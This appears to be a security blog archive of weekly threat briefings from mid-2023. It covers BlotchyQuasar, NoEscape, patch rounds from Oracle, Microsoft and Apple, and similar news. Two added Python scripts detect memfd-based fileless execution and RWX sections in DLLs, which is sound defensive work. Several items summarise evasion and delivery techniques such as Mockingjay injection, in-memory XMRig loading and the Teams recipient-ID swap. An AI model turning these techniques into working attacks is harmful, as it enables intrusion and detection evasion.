IBM Security X-Force has detected an email phishing campaign distributing the BlotchyQuasar malware from late April to last May. The malware, developed by a group identified as Hive0129, is coded to collect credentials from multiple banking websites and applications in Latin America. It is a banking Trojan developed on the code base of QuasarRAT, which is under continuous development and has functionalities such as the installation of certificates and automatic proxy configuration URLs that can facilitate the impersonation of financial institutions. It also installs third-party tools such as PuTTY, RDP, Chrome/Opera Portable, AnyDesk and other credential stealers. The campaign consists of sending victims an email impersonating a government agency in Latin America, which includes a link to a document and a PDF that starts the infection chain. As for the group, Hive0129 has been tracked by X-Force since 2019; it is believed to originate in South America and targets government and private entities in Colombia, Ecuador, Chile, and Spain.
More info

NoEscape: new ransomware threatening double extortion and data breaches
A new ransomware was recently spotted and is believed to be the successor to Avaddon, which shut down operations in 2021. Known as NoEscape, this new ransomware began operating in June 2023, targeting businesses in double extortion attacks. The operators threaten to release data to the public unless a ransom is paid, ranging from hundreds of thousands to more than $10 million. NoEscape steals corporate data before encrypting files and kills processes associated with security software, backup applications, web servers and databases. In addition, it uses Salsa20 encryption and adds a unique 10-character extension to encrypted files. It also modifies the wallpaper and displays ransom notes providing ransom payment instructions on its Tor website. There are currently ten affected victims from different countries and industries on their data leak site, indicating that they do not focus on a specific industry or region.
More info

BundleBot stealer analysis
Researchers at Check Point Research have published a paper analysing a new stealer/bot that abuses the dotnet bundle as a single file. Referred to as BundleBot, it is distinguished by its more sophisticated infection chain, which leverages Facebook ads and compromised accounts to redirect victims to websites that spoof software, AI tools and games. Some of these include Google AI, PDF Reader, Canva or Super Mario 3D World. Once the victim accesses and downloads the illegitimate program, the first stage of infection begins, which consists of a RAR file containing the dotnet package. In the second stage, a password-protected ZIP is downloaded, extracted, and executed by BundleBot, which exploits the dotnet package. As a stealer, its functionalities include the exfiltration of system information via its C2, including computer data such as user name, operating system version and IP, web browser data such as cookies, credentials or credit cards, Facebook account information, and screenshots. It should be noted that due to the use of the dotnet package as a single file, multi-stage infection and obfuscation, BundleBot is characterised by being difficult to detect.
More info

Oracle Security Bulletin
Oracle has released security patches to fix security flaws affecting more than 130 products used in various industries. A total of 508 new security patches have been addressed in July, 76 of which are considered critical. Among the patched products are Oracle Financial Services Applications, with a total of 147 vulnerabilities, of which 115 could be exploited remotely. In addition, Oracle Communications said that of the 77 security flaws collected, 57 could also be exploited remotely by malicious actors. Oracle Fusion Middleware shows similar figures, with 60 security updates of which 40 have been identified as remotely exploitable. It should also be noted that MySQL is also one of the most affected products, with a total of 21 vulnerabilities. Oracle recommends that users update to the latest version to avoid possible exploitation by malicious actors.
More info
Photo: rawpixel.com / Freepik.
July 21, 2023
Cyber Security
Cyber Security Briefing, 8-14 July
Three new vulnerabilities in MOVEit Transfer fixed
Progress Software has released security updates for three vulnerabilities affecting the MOVEit Transfer software. The first one, identified as CVE-2023-36934 and of critical severity, could allow unauthenticated attackers to gain unauthorised access to the MOVEit database and from there execute malware, manipulate files or extract information. Another vulnerability fixed was considered to be of high severity. Identified as CVE-2023-36932, it consists of a SQL injection flaw that can be exploited by logged-in threat actors to gain unauthorised access to the software database. These two SQL injection security issues affect versions 12.1.11, 13.0.9, 13.1.7, 14.0.7, 14.1.8, 15.0.4 and earlier. The third security flaw fixed is CVE-2023-36933, a vulnerability that allows threat actors to unexpectedly close the MOVEit Transfer program. It affects versions 13.0.9, 13.1.7, 14.0.7, 14.1.8, and 15.0.4. Progress Software has made the necessary updates available for all versions and strongly recommends that users upgrade to the latest version to reduce the risks posed by these vulnerabilities. In addition, due to recent events, the company announced that it plans to release MOVEit product updates every two months.
More info

Apple 0-day vulnerability patched
Apple has released a new round of Rapid Security Response (RSR) updates to address a new 0-day vulnerability exploited in attacks affecting iPhones, Macs and iPads. The vulnerability has been classified as CVE-2023-37450 and was reported by an anonymous researcher. Apple reports that it is aware that the 0-day vulnerability may have been actively exploited. The vulnerability was found in the Apple-developed WebKit browser engine, and allows attackers to obtain arbitrary code execution on targeted devices by tricking users into opening web pages with maliciously crafted content. The company has addressed this vulnerability with enhanced checks to mitigate exploitation attempts. Since the beginning of 2023, Apple has patched ten 0-day vulnerabilities affecting iPhones, Macs or iPads.
More info

Microsoft fixes 132 vulnerabilities, including six 0-day flaws
Microsoft released its monthly security update to address a total of 130 vulnerabilities, including six 0-day flaws that have been actively exploited. Of the 130 vulnerabilities, nine were classified as critical and 121 as important. Some of the actively exploited security holes include a privilege elevation vulnerability in the Windows MSHTML platform (CVE-2023-32046), security feature bypasses in Windows SmartScreen and Microsoft Outlook (CVE-2023-32049 and CVE-2023-35311), privilege escalation in the Windows Error Reporting service (CVE-2023-36874), and remote code execution in Office and Windows HTML (CVE-2023-36884). Other critical vulnerabilities were also published, including some that allow remote code execution. Microsoft urges its users to apply updates as quickly as possible to mitigate potential threats.
More info

Critical vulnerability in Citrix Secure Access fixed
Citrix has issued a security advisory addressing a critical vulnerability that could allow threat actors to escalate their privileges if they have access to an endpoint with a standard user account. The vulnerability, identified as CVE-2023-24492, has a CVSS of 9.8 and affects Citrix Secure Access Client for Ubuntu in versions prior to 23.5.2. Attackers can exploit this vulnerability to remotely execute malicious code on a user's device. This can be achieved by persuading the user to click on a malicious link and accept subsequent prompts. Citrix also fixed another vulnerability, recognised as CVE-2023-24491 (CVSS 7.8), that affects Citrix Desktop for Windows in versions prior to 23.5.1.3. This security flaw allows an authenticated attacker with access to a standard endpoint to elevate privileges to NT AUTHORITY\SYSTEM. Both vulnerabilities were discovered by Rilke Petrosky of F2TC Cyber Security. Citrix recommends that users of these products upgrade to the latest versions to prevent exploitation.
More info

Analysis of PyLoose, Python-based fileless malware
Researchers at Wiz.io have published an analysis of PyLoose, an innovative fileless malware that acts on cloud workloads. According to the researchers, this type of attack has been used for cryptomining in up to 200 cases. Firstly, the attacker gains initial access via an exposed Jupyter Notebook service. Secondly, instead of writing payloads to disk, they exploit operating system features by decrypting and decompressing XMRig and loading it into memory via memfd, the Linux RAM-based file system. They finally run XMRig in memory, connected to a remote IP associated with the MoneroOcean mining cluster. It is worth noting how hard this type of attack is to detect with conventional security measures.
More info
Image: rawpixel.com at Freepik.
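The PyLoose write-up above notes that a payload loaded through memfd never touches disk, which defeats file-based scanning. What does remain visible is the process table: a binary executed from a memfd shows up in `/proc/<pid>/exe` as a link of the form `/memfd:<name> (deleted)`, and memfds a process still holds open appear the same way under `/proc/<pid>/fd/`. The script below is an added example, not code from the Wiz.io analysis or from the original post; it assumes a Linux host with `/proc` mounted for the live scan, and the sample entries (including the memfd name `kdmflush`) are constructed to mimic what `/proc` would show.

```python
"""Flag Linux processes that execute from, or hold, an anonymous memfd.

Added example for the PyLoose item above; not code from Wiz.io or the post.
Assumes a Linux host with /proc mounted for the live scan. The classifier is
pure Python and runs anywhere on the constructed SAMPLE input.
"""
import os
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional, Tuple

# readlink("/proc/<pid>/exe") for an image created with memfd_create() looks like
# "/memfd:<name> (deleted)"; open memfds show the same form under /proc/<pid>/fd/.
MEMFD_RE = re.compile(r"^/memfd:(?P<name>.*?)(?: \(deleted\))?$")


@dataclass
class Finding:
    pid: int
    cmdline: str
    exe_memfd: Optional[str]                              # memfd name if the main image is a memfd
    fd_memfds: List[str] = field(default_factory=list)    # names of memfds still held open


def memfd_name(link_target: str) -> Optional[str]:
    """Return the memfd name encoded in a /proc link target, or None if it is a real path."""
    m = MEMFD_RE.match(link_target)
    return m.group("name") if m else None


def classify(pid: int, exe_link: str, fd_links: Iterable[str], cmdline: str) -> Optional[Finding]:
    """Build a Finding when the process executes from, or holds, a memfd; else None."""
    exe = memfd_name(exe_link)
    fds = [n for n in (memfd_name(t) for t in fd_links) if n is not None]
    if exe is None and not fds:
        return None
    return Finding(pid, cmdline, exe, fds)


def scan(entries: Iterable[Tuple[int, str, List[str], str]]) -> List[Finding]:
    """Run classify() over (pid, exe_link, fd_links, cmdline) tuples and keep the hits."""
    return [f for f in (classify(*e) for e in entries) if f is not None]


def read_proc() -> Iterable[Tuple[int, str, List[str], str]]:
    """Collect (pid, exe_link, fd_links, cmdline) tuples from a live /proc (Linux only)."""
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            exe_link = os.readlink(f"/proc/{pid}/exe")
            fd_dir = f"/proc/{pid}/fd"
            fd_links = []
            for fd in os.listdir(fd_dir):
                try:
                    fd_links.append(os.readlink(f"{fd_dir}/{fd}"))
                except OSError:
                    continue                      # fd closed between listdir and readlink
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue                              # process exited, or not ours to inspect
        yield pid, exe_link, fd_links, cmdline


# Constructed sample: two benign processes and one fileless miner whose image is
# an anonymous memfd given a kernel-thread-like name. Values are made up here.
SAMPLE = [
    (1204, "/usr/bin/python3.10", ["/dev/null", "socket:[33021]"], "python3 -m jupyter notebook"),
    (4711, "/memfd:kdmflush (deleted)", ["/dev/null", "socket:[33190]"], "kdmflush"),
    (4800, "/usr/sbin/sshd", ["/dev/null", "/var/log/auth.log"], "sshd: /usr/sbin/sshd -D"),
]

if __name__ == "__main__":
    live = os.name == "posix" and os.path.isdir("/proc")
    for f in scan(read_proc() if live else SAMPLE):
        print(f"pid={f.pid} exe_memfd={f.exe_memfd} open_memfds={f.fd_memfds} cmd={f.cmdline!r}")
```

Run as root for full coverage, since `/proc/<pid>/exe` of other users' processes is not readable otherwise. A hit is not proof of compromise on its own (some runtimes use memfds legitimately), but an executable image that is a memfd with an innocuous or kernel-like name, paired with outbound connections to a mining pool, is exactly the combination the PyLoose report describes and is worth an alert.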
July 14, 2023
Cyber Security
Cyber Security innovations to protect business: new solutions for new threats
Cyber Security has become a top priority for businesses. Having advanced solutions that offer comprehensive and robust protection is essential given the increase in cyberthreats and the constant risk faced by organisations. In this context, at Telefónica Tech, in collaboration with our strategic partner Check Point Software, we have positioned ourselves as a benchmark in the field of Cybersecurity. The most outstanding new features of Check Point Quantum Network Security were revealed at a recent event organised by Check Point Software. We have included them in the portfolio of Cyber Security services that Telefónica Tech offers its customers.

The new Cyber Security landscape
The event began by addressing the current cyber security landscape, highlighting concerns about next-generation attacks using AI-based technologies. Although manufacturers of cyber security solutions already have defence and protection technology that makes use of Artificial Intelligence, the implementation of these solutions is still a challenge for many companies. The event emphasised the need to change the way teams operate and the importance of having the skills to manage infrastructure more effectively. These are two capabilities that we apply in the managed and professional services that we provide from Telefónica Tech when deploying cyber security technologies.

The evolution of cyber threats
Discussion during the event also focused on the evolution of cyber threats over the past year and the measures implemented to strengthen companies' defences. The increase in hacktivism, in the activity of more organised and politically motivated groups that have become more destructive, was mentioned. The use of legitimate tools by cybercriminals, who take advantage of applications already installed on users' devices to infiltrate malicious software, was highlighted. In this regard, a zero-trust strategy minimises such trends and provides more protection.

Latest addition to the Check Point Quantum Network Security portfolio: next-generation firewalls
One of the most important aspects of the event was the presentation of new hardware technologies, such as Check Point Software's firewalls, to ensure customers' network security in three fundamental pillars:
- Check Point Quantum, which offers complete network protection.
- Check Point CloudGuard, focused on protecting cloud security.
- Check Point Harmony, which provides security for users, devices, mobile access and emails.
These solutions are complemented by ThreatCloud, an intelligence network, and Horizon, a unified operations management platform. Within our partner Check Point Software's portfolio, the new Quantum firewalls stand out as an essential tool for access management and threat prevention at the perimeter and for network segmentation. Check Point Software's new firewall proposition, called Quantum Maestro, allows you to connect and harden your network security infrastructure. Quantum Maestro is a single piece of hardware that connects all legacy clusters and even virtual firewalls, allowing growth on demand, adapting the need for hardware to traffic growth, optimising CAPEX investment and minimising the risk of forecasting incorrect needs. The ability to prevent in real time, versus detection, is a significant advantage, reducing exposure to malware and minimising false positives. Threat Extraction, a feature that enables real-time delivery of completely clean office documents, was also presented. Another key aspect of the event was the importance of automation, integration with other technologies and dynamic policy building. The integration of Check Point's Security Platform with other technology vendors, such as Cisco ACI Switch Fabric and NSX-T, was highlighted as an important step towards unified security management. The Zero Trust strategy was also mentioned as an effective way to protect systems by denying all unauthorized access and allowing only what is necessary. In addition, the R81 Cyber Security Platform was presented, including SD-WAN and IoT Protect functionalities for enhanced network protection.

The future of cyber security
The event concluded by highlighting the fundamental role of Artificial Intelligence in the new Cyber Security landscape. The application of AI techniques, such as deep learning, allows for more accurate threat detection and a significant reduction in false positives. Check Point Software has developed more than 75 engines based on traditional and AI-based technologies to diagnose and prevent vulnerabilities across all technologies. Our partnership with Check Point Software benefits businesses by strengthening their security, resilience, and continuity through advanced security solutions, thereby reaffirming our joint commitment to deliver products and solutions for comprehensive and robust cyber security.

AUTHORS: IGNACIO GARCÍA HERRAEZ, Strategic Partners Development Expert, and MARISA STRZELECKI SINOPOLI, Strategic Partners Development Sr Manager.
Image from Freepik.
July 13, 2023
Telefónica Tech
5 steps to close the gender gap in science and technology
Rosalind Franklin, Lise Meitner, Esther Lederberg and Ada Lovelace are just some of the women whose contributions to science were not recognised at the time because of their gender, because they were not men. Whilst we have come a long way, we cannot ignore the gender gap that widely exists in the fields of science, technology and mathematics (STEM), where women make up only 20% of the workforce. Empowering women from day 1 ensures STEM workforces are diverse. Diversity breeds innovation, and innovation breeds success.

Education
From an early age, boys are pushed towards science and maths to become astronauts, engineers and programmers, whilst girls are pushed towards humanities subjects and languages, celebrated for their creativity rather than their intelligence. It is estimated that a girl loses self-confidence in her mathematical abilities between the ages of 13 and 15, despite outperforming boys of similar ages in these fields. Education is an essential component in closing the gender gap in STEM, as it can stop underlying gender bias from day 1. It can give girls the hard skills required to become programmers, data scientists, engineers, physicians..., and it can teach everyone about the importance of diversity, not only in STEM but in every industry.

"This is not about fixing women — it is about recognising that girls and young women often learn a set of concepts in early years that limit their views of themselves." Gabriela Mueller Mendoza, speaker on diversity in STEM

Schools are the key place to convince girls from day 1 that they are just as capable as their male counterparts. Girls often don't choose to continue with these subjects because they never saw it as a possibility, maybe because no women in their family ever pursued science. Encouraging girls to believe in their intelligence is a necessity.

Work experience
A lack of role models and of accessible work experience to show young girls how they can fit into this field of work is also responsible for the STEM gender gap. Whilst education can provide the hard skills necessary to be hired, nothing compares to real-life experience. Female leaders already in the field need to be part of the movement to inspire the next generation and to act as mentors. This means going into local schools and youth centres to pass on expertise and advice. Education and work experience give girls the drive to work in STEM.

Diversity
Innovation in the workplace requires diversity: diversity of genders, cultures and ages to bring something new and creative. This means hiring a diverse workforce and training the existing workforce on the importance of inclusion. A push for diversity may also mean companies need to stamp out unconscious and conscious biases, removing both legal barriers and social invisibilities. The solution needs to be a concerted effort to train HR, recruiters and managers on the importance of making teams diverse and keeping them that way, via upskilling or directly hiring skilled women to be part of the change. Also, within companies, there need to be equal opportunities for women to be promoted. Diversity is also very important in programming to produce fair machine learning systems. If these automated systems are fed with examples of biased justice, they will end up perpetuating these same biases. Diversity in programming teams is important to spot these biases and mitigate against them. Artificial Intelligence will only learn to be inclusive, fair and representative if we are. Diversity in the workplace means more opportunities for women, which encourages them to enter and remain in STEM careers.

Support those at the top
Too often women at the top are not given the recognition they deserve. Once women reach the top, they need to be celebrated, not doubted. More comments are made about what they are wearing than about what they have achieved and how hard they worked to get there. We all need to celebrate those women in our company, sector or community who have climbed to the top.

Self-belief
As with many things, as women we need to have the self-belief to achieve what we want in STEM because we are no less capable than the men around us! Together we can close the gender gap in STEM.

Photo: Unsplash.
July 12, 2023
Cyber Security
Cyber Security Briefing, 1-7 July '23
Microsoft denies being a victim of data breach by Anonymous Sudan
The hacktivist group Anonymous Sudan recently posted on its Telegram channel that an alleged database containing more than 30 million Microsoft account credentials was for sale for $50,000. It also included a sample of data as proof of the threat actor's claims. However, digital media outlet BleepingComputer contacted Microsoft for information about the incident, to which a company spokesperson said that after conducting an internal investigation there was no evidence that the data had been accessed or compromised by Anonymous Sudan. It is worth noting that last month Microsoft admitted that Anonymous Sudan was responsible for disruptions to services such as Azure, Outlook and OneDrive through DDoS attacks.
More info

Mozilla fixes vulnerabilities in Firefox
Mozilla has released Firefox 115, which fixes a number of vulnerabilities. Firstly, there are several high-impact vulnerabilities: CVE-2023-37201, a use-after-free flaw in WebRTC, and CVE-2023-37202, a potential use-after-free flaw in SpiderMonkey. In addition, CVE-2023-37211 and CVE-2023-37212 are due to memory safety bugs, which could be exploited to execute arbitrary code. On the other hand, CVE-2023-3482, with a moderate impact, could allow malicious websites to store tracking data without permission, even if the browser is configured to block the storage of cookies. The other moderate-impact vulnerabilities include those identified as CVE-2023-37203, CVE-2023-37204, CVE-2023-37205, CVE-2023-37206, CVE-2023-37207, CVE-2023-37208 and CVE-2023-37209, which could lead to spoofing attacks or bugs that allow URL spoofing in the address bar, insufficient validation of links in the file system API, missing warnings when opening files with malicious content, or use-after-free conditions. It is recommended to update Firefox to fix these security issues.
More info

Malicious campaign against banks in Spain and Chile
SentinelOne researchers, in collaboration with vx-underground, have published the results of an investigation into a campaign targeting banking institutions by the threat actor Neo_Net. The malicious actor is reportedly behind an Android malware campaign targeting financial institutions around the world, but mainly geolocated in Spain and Chile, between June 2021 and April 2023. Neo_Net is estimated to have stolen more than €350,000 from bank accounts and compromised the personal information of thousands of victims. In terms of methodology, the attacks occur in several stages, starting with SMS phishing messages, using sender IDs (SIDs) to impersonate the bank in order to trick victims, and continuing with a wide-ranging infrastructure, including phishing panels and Android trojans.
More info

Google fixes three actively exploited Android vulnerabilities
Google has released monthly security updates for the Android operating system in which it fixed 46 vulnerabilities affecting the OS, including three 0-day vulnerabilities that were being actively exploited. The first of these, identified as CVE-2023-26083 (CVSS 3.3), is a memory leak flaw in the Arm Mali GPU driver for Bifrost, Avalon and Valhall chips, which was exploited in an exploit chain that delivered spyware to Samsung devices in December 2022. The second security flaw, CVE-2021-29256 (CVSS 8.8), is a high-severity root privilege escalation and information disclosure flaw that also affects specific versions of the Bifrost and Midgard Arm Mali GPU kernel drivers. The third vulnerability, CVE-2023-2136 (CVSS 9.6), is an integer overflow bug in Skia, Google's open-source cross-platform 2D graphics library that is also used in Chrome. In addition, a critical vulnerability (CVE-2023-21250) in the Android System component affecting OS versions 11, 12 and 13 was fixed. Exploitation of this vulnerability could lead to remote code execution without user interaction or additional execution privileges. Google recommends updating Android to patch level 2023-07-05 or later to address these issues.
More info

New tool developed to deliver malware to Teams users
The US Navy Red Team has developed a tool that can exploit a vulnerability in Microsoft Teams and deliver malicious files to users in an organisation. The tool, called TeamsPhisher, is Python-based and provides a fully automated attack. It works in environments where communication between internal and external Teams users is allowed. Malicious actors could send malicious files to victims' inboxes without relying on traditional phishing scams. TeamsPhisher incorporates techniques for initial access to Teams described by researcher Andrea Santese. It also includes the one recently disclosed by researchers at Jumpsec Labs, which allows circumventing a security feature in Teams by using an insecure direct object reference (IDOR) technique. In addition, it uses a tool called TeamsEnum, developed by Secure Systems Engineering, to enumerate Teams users and verify that they can receive external messages. Microsoft has so far not addressed the vulnerability that TeamsPhisher exploits, stating that it does not meet the requirements for immediate servicing.
More info
Photo: tirachardz / Freepik.
July 7, 2023
Cyber Security
Cyber Security Briefing, 26 – 30 June
BIND DNS server vulnerabilities fixed
The Internet Systems Consortium (ISC) has issued security advisories to address multiple vulnerabilities affecting several versions of Berkeley Internet Name Domain (BIND), the most widely deployed DNS server software. The vulnerabilities addressed include CVE-2023-2828, CVE-2023-2829 and CVE-2023-2911, all with a CVSS score of 7.5. Their successful exploitation could exhaust all available memory on a target server, making it unavailable and causing a denial of service (DoS). Although ISC said it has no evidence of exploitation of the flaws, it strongly recommends that BIND users upgrade to the latest version of the software.

New Volt Typhoon campaign exploiting vulnerability in Zoho ManageEngine
The APT known as Volt Typhoon or Bronze Silhouette has been detected using a critical vulnerability. According to research by CrowdStrike, which tracks the adversary under the name Vanguard Panda, the cyberespionage group was observed in a recent campaign targeting critical infrastructure in the Pacific region. In that campaign, the group customised its tactics using exploits and lateral movement techniques, as well as the CVE-2021-40539 vulnerability in Zoho's ManageEngine ADSelfService Plus, a password management and single sign-on solution, which allowed it to remotely execute code and mask its web shell as a legitimate process, deleting logs as it went along. However, the researchers note that despite these attempts to cover its tracks, further web shells, backdoors, Java source code and compiled files from the Apache Tomcat web server were detected, leading to its discovery. Volt Typhoon nonetheless had widespread access to the victim's environment over an extended period, demonstrating familiarity with the targeted infrastructure and diligence in cleaning up its tracks.

Mockingjay: new technique to bypass EDR detection
Cybersecurity researchers at Security Joes discovered a new process injection technique called Mockingjay, which could allow threat actors to bypass EDR and other security products to stealthily execute malicious code on compromised systems. Mockingjay differs from other approaches because it does not use commonly abused Windows API calls, set special memory permissions, perform memory allocations, or even start a thread, eliminating many potential opportunities for detection. Security Joes analysts found that the msys-2.0.dll DLL shipped with Visual Studio 2022 Community has a default RWX (read, write and execute) section 16 KB in size. By leveraging this pre-existing RWX section, code can be placed and executed in memory that already carries those protections, avoiding the allocation and permission-change calls that EDRs typically monitor.

Campaign against web hosting companies uncovered
Researchers at Palo Alto Networks' Unit 42 uncovered an active campaign that targeted web hosting and IT companies for more than two years. The campaign, named CL-CRI-0021 or Manic Menagerie 2.0, aimed to leverage the resources of compromised servers by installing cryptocurrency miners on the machines for monetary gain. In addition, it deployed web shells to gain sustained access to the internal resources of the compromised websites. The threat actors turned hijacked legitimate websites into large-scale command and control (C2) servers, affecting thousands of web pages. Because this malicious activity was carried out from legitimate, reputable websites, it was difficult for security solutions to detect. Multiple techniques were used to evade detection by monitoring tools and cybersecurity products, and payloads, custom tools and legitimate publicly available tools were combined to avoid matching known malware. This threat actor is believed to have been active since at least 2018, targeting web hosting companies in Australia.

Analysis of Dark Power ransomware
Researchers at Heimdal Security have published an analysis of the Dark Power ransomware, which was first detected in early 2020. It is a highly effective ransomware written in Nim that employs an encryption scheme in which a randomly generated, unique ASCII string is used to obtain the decryption key. Heimdal reports that distribution is carried out via phishing emails and could also occur through the exploitation of vulnerabilities. After infiltrating the system, it starts a workflow in which it initialises the encryption key, encrypts the binary string, terminates processes and services, and can also exclude certain files and folders from encryption. As for the ransom, the actors ask for approximately $10,000 and include in the note a Monero cryptocurrency address and a TOR link to their website. According to the available data, Dark Power has targeted entities in sectors such as education, healthcare, manufacturing and food production, with samples identified in the US, Peru, Turkey, France, Israel, Egypt, Algeria and the Czech Republic. Since its re-emergence last February, at least 10 companies have been compromised.

Image: Freepik.
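The Mockingjay item in this briefing turns on a DLL that ships with a section already marked readable, writable and executable. The defensive counterpart is an inventory of such sections across the DLLs on a host, which needs nothing more than the PE section table. The Python below is an added example, not code from the original briefing or from Security Joes: it walks DOS header, PE signature, COFF header and section headers with the standard library and reports any section whose characteristics carry all three of IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE. The sample PE it builds is constructed in-line so the script runs offline; its section names and sizes are assumptions and are not taken from msys-2.0.dll.

```python
import struct
import sys
from dataclasses import dataclass
from pathlib import Path

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    characteristics: int

    @property
    def is_rwx(self) -> bool:
        # All three permission bits must be set at once.
        return self.characteristics & RWX == RWX


def parse_sections(data: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    coff = e_lfanew + 4
    # COFF file header (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _machine, n_sections, _ts, _symptr, _nsyms, opt_size, _flags = struct.unpack_from(
        "<HHIIIHH", data, coff
    )
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(n_sections):
        # IMAGE_SECTION_HEADER is 40 bytes; Characteristics is the last DWORD.
        fields = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        raw_name, vsize, vaddr, *_rest, chars = fields
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        sections.append(Section(name, vsize, vaddr, chars))
    return sections


def find_rwx_sections(data: bytes) -> list:
    return [s for s in parse_sections(data) if s.is_rwx]


def build_sample_pe(section_specs) -> bytes:
    """Constructed minimal PE so the example runs offline. SizeOfOptionalHeader
    is 0 here; real binaries have a non-zero one, which parse_sections skips
    by its declared size."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature right after DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_specs), 0, 0, 0, 0, 0x2022)
    body = b"PE\0\0" + coff
    for name, vsize, vaddr, chars in section_specs:
        body += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, vaddr,
                            0, 0, 0, 0, 0, 0, chars)
    return bytes(dos) + body


# Constructed section table (assumed names): ordinary code and data sections
# plus one RWX section of 16 KB, the size the briefing reports for msys-2.0.dll.
SAMPLE_SECTIONS = [
    (b".text", 0x1000, 0x1000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | 0x20),
    (b".data", 0x1000, 0x2000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | 0x40),
    (b".rwx", 0x4000, 0x3000, RWX | 0x40),
]


def scan_file(path: str) -> list:
    """Report RWX sections of a PE on disk (the real-world entry point)."""
    return find_rwx_sections(Path(path).read_bytes())


if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        for t in targets:
            for s in scan_file(t):
                print(f"{t}: RWX section {s.name!r} at RVA 0x{s.virtual_address:x}, {s.virtual_size} bytes")
    else:
        for s in find_rwx_sections(build_sample_pe(SAMPLE_SECTIONS)):
            print(f"sample: RWX section {s.name!r} at RVA 0x{s.virtual_address:x}, {s.virtual_size} bytes")
```

Run it with no arguments to scan the constructed sample, or pass one or more DLL paths to inventory a host. A hit is not proof of abuse, since some legitimate runtimes ship RWX sections, but it is the list of modules worth watching for unexpected code execution from those ranges.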
June 30, 2023
Cyber Security
Cyber Security Briefing, 19 – 23 June
Critical vulnerabilities in Asus routers
Asus has issued a security advisory addressing a total of nine vulnerabilities affecting multiple router models. Among these security flaws, the one registered as CVE-2022-26376 stands out for its criticality: it is due to a memory corruption in the Asuswrt firmware that could allow threat actors to perform denial-of-service attacks or achieve code execution. The vulnerability registered as CVE-2018-1160 is due to an out-of-bounds write in Netatalk, which could be exploited to achieve arbitrary code execution on vulnerable devices. In addition, Asus has indicated that if the new firmware version cannot be installed on the affected devices, it is recommended to disable the services accessible from the WAN side to avoid possible repercussions.

Critical vulnerabilities in WordPress plugins
Researchers at Defiant have identified two critical authentication bypass vulnerabilities in two WordPress plugins with tens of thousands of installations. On the one hand, there is the security flaw registered as CVE-2023-2986, with a CVSSv3 score of 9.8, which affects Abandoned Cart Lite for WooCommerce. Exploiting this vulnerability could allow malicious actors to log in as customers or access admin accounts and compromise the affected website. The issue has been patched in version 5.15.1 of Abandoned Cart Lite for WooCommerce. On the other hand, there is CVE-2023-2834, affecting the WordPress BookIt plugin. An attacker could exploit this flaw to gain access to any account on the affected website, including the administrator account, knowing only the account's email address. This issue has been fixed in BookIt version 2.3.8.

Apple patches the two 0-days used in Operation Triangulation
Apple has released an emergency security update to patch the two 0-day vulnerabilities used in Operation Triangulation, as Kaspersky, which discovered the incident, has called the campaign. The two vulnerabilities, CVE-2023-32434 and CVE-2023-32435, were exploited in a zero-click attack (receipt of the message triggers the infection without the need for user interaction) against iOS devices via iMessage. This security update from Apple coincides with Kaspersky's publication of its final analysis of Operation Triangulation and of the spyware delivered by exploiting the two 0-days. Kaspersky highlights that the spyware has capabilities to manipulate files, interfere with running processes, exfiltrate credentials and certificates, and transmit geolocation data, including the device's coordinates, altitude, speed and direction of movement.

Microsoft Teams flaw allows malware to be distributed
Researchers at Jumpsec have published the results of an investigation in which they claim to have identified a security flaw in Microsoft Teams that could allow malware to be distributed. Specifically, the experts say they have discovered a way for an account outside the target organisation to bypass the relevant security measures so that malware is delivered directly into the inbox. The attack works when the victim is running Microsoft Teams with default settings: the attacker changes the internal and external recipient ID in the POST request of a message, tricking the system into treating an external user as internal. The executable that is sent is actually hosted on a SharePoint domain, and the target downloads it from there. Microsoft acknowledges the problem but has pointed out that it does not meet the bar for immediate servicing.

New Mirai variant exploits multiple IoT vulnerabilities
A variant of the Mirai botnet has been discovered by researchers at Palo Alto Networks Unit 42. The variant targets nearly two dozen vulnerabilities in devices from brands such as D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear and MediaTek, with the aim of using them in DDoS attacks. The malware has been identified in two ongoing campaigns that started in March and escalated in April and June, and targets a total of 22 known security holes in connected products such as routers, DVRs, NVRs and access control systems, among others. The attack starts by exploiting one of the aforementioned flaws, then downloads a botnet client suited to the compromised device and accesses its encrypted strings directly, making it difficult to detect. Unlike other Mirai variants, this one does not brute-force login credentials, so it relies on the operators manually exploiting vulnerabilities. Signs of infection on IoT devices include overheating, configuration changes, frequent disconnections and a general decrease in performance.
June 23, 2023
Cyber Security
Cyber Security Briefing, 12 – 16 June
Microsoft fixes more than 70 vulnerabilities in its June Patch Tuesday
